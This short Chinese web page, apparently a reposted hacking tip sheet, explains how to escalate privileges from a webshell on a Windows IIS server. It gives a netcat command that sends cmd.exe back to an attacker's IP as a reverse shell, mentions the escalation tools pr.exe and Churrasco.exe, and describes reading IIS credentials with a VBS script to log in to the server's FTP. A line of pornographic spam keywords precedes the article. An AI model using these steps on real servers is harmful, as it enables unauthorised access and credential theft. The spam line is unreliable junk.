亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

webshell下提權(quán)兩個(gè)小技巧分享

  發(fā)布時(shí)間:2011-03-31 21:53:20   作者:佚名   我要評(píng)論
webshell下提權(quán)兩個(gè)小技巧分享,需要的朋友可以測(cè)試下。
webshell提權(quán)小技巧

cmd路徑:
c:\windows\temp\cmd.exe
nc也在同目錄下
例如反彈cmdshell:
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
通常都不會(huì)成功。

而直接在 cmd路徑上 輸入 c:\windows\temp\nc.exe
命令輸入 -vv ip 999 -e c:\windows\temp\cmd.exe
卻能成功。。
這個(gè)不是重點(diǎn)
我們通常 執(zhí)行 pr.exe 或 Churrasco.exe 時(shí) 有時(shí)候也需要 按照上面的 方法才能成功。

友情檢測(cè)波爾遠(yuǎn)程控制官方網(wǎng)站
作者:MYC00l [Y.D.T]

第一處:把代碼保存為1.vbs 上傳到服務(wù)器上,執(zhí)行cscript 1.vbs,又提示拒絕訪(fǎng)問(wèn)。

其實(shí)這里,我們只要自己上傳一個(gè)cscript.exe 一般就可以解決問(wèn)題,這個(gè)程序默認(rèn)位于系統(tǒng)文件夾下,是win32 控制臺(tái)下的腳本宿主引擎,用來(lái)執(zhí)行vbs 等腳本程序的。

第二處:用VBS腳本查看到目標(biāo)IIS帳號(hào)和密碼后,CMD下FTP發(fā)現(xiàn)目標(biāo)用的是微軟FTP,直接用IIS帳號(hào)和密碼登錄進(jìn)去了。

IIS帳號(hào)和密碼和微軟自帶的FTP帳號(hào)和密碼默認(rèn)都是一樣的。

相關(guān)文章

最新評(píng)論